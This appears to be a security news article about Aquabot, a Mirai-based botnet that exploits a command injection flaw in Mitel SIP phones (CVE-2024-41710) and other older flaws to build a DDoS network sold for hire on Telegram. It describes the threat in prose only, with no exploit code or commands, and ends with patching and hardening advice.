Aquabot Botnet Exploiting Mitel Phone Vulnerability to Fuel DDoS Attacks

A newly observed Mirai-based botnet variant, known as Aquabot, has been actively exploiting a command injection flaw in Mitel SIP phones to enlist them into a DDoS attack network.

The vulnerability in question, CVE-2024-41710 (CVSS score: 6.8), affects Mitel 6800, 6900, and 6900w Series SIP Phones, as well as the Mitel 6970 Conference Unit. It allows arbitrary command execution during the boot process, potentially granting attackers remote control over affected devices. Mitel patched the issue in July 2024, but a proof-of-concept (PoC) exploit was made public in August, making exploitation attempts inevitable.

Expanding the Attack Surface

Aquabot doesn't just target CVE-2024-41710—it also attempts to exploit older, known vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw in Linksys E-series devices.

First identified in November 2023, Aquabot's primary goal is to build a botnet for large-scale DDoS attacks, according to Akamai researchers Kyle Lefton and Larry Cashdollar. Since January 2025, researchers have observed active exploitation attempts using attack payloads that closely resemble the publicly available PoC exploit.

The attack sequence includes executing a shell script that uses the "wget" command to download Aquabot binaries suited for different CPU architectures.

Aquabot’s Evasive and Persistent Features

The latest version of Aquabot appears to be the third iteration of the malware, introducing a "report_kill" function that notifies the C2 server whenever the bot is terminated. While no direct response from the C2 server has been observed, researchers suspect this function could be part of future stealth enhancements or used to counteract rival botnets.

Additional stealth tactics include:

• Disguising itself as "httpd.x86" to blend in with system processes.
• Terminating processes that match certain conditions, such as local shell sessions.
• Enhanced signal handling, potentially to detect anti-malware activity or competing botnet threats.

Botnet-for-Hire Services on Telegram

There is growing evidence suggesting that Aquabot’s operators are monetizing their botnet by offering DDoS-for-hire services on Telegram under names like Cursinq Firewall, The Eye Services, and The Eye Botnet.

Despite claims that these networks are used only for testing DDoS mitigation, deeper investigations have revealed advertisements for DDoS-as-a-service offerings and bragging about botnet control in underground Telegram groups.

Ongoing Threat of Mirai-Based Botnets

Aquabot is yet another example of how Mirai-based malware continues to exploit insecure, internet-connected devices, especially those with default credentials, outdated firmware, or poor security configurations. Such devices remain prime targets for cybercriminals looking to build powerful DDoS attack networks.

As threat actors evolve their techniques, device manufacturers and users must stay vigilant—regularly patching vulnerabilities, restricting remote access, and enforcing strong authentication are essential steps in mitigating the risks posed by botnets like Aquabot.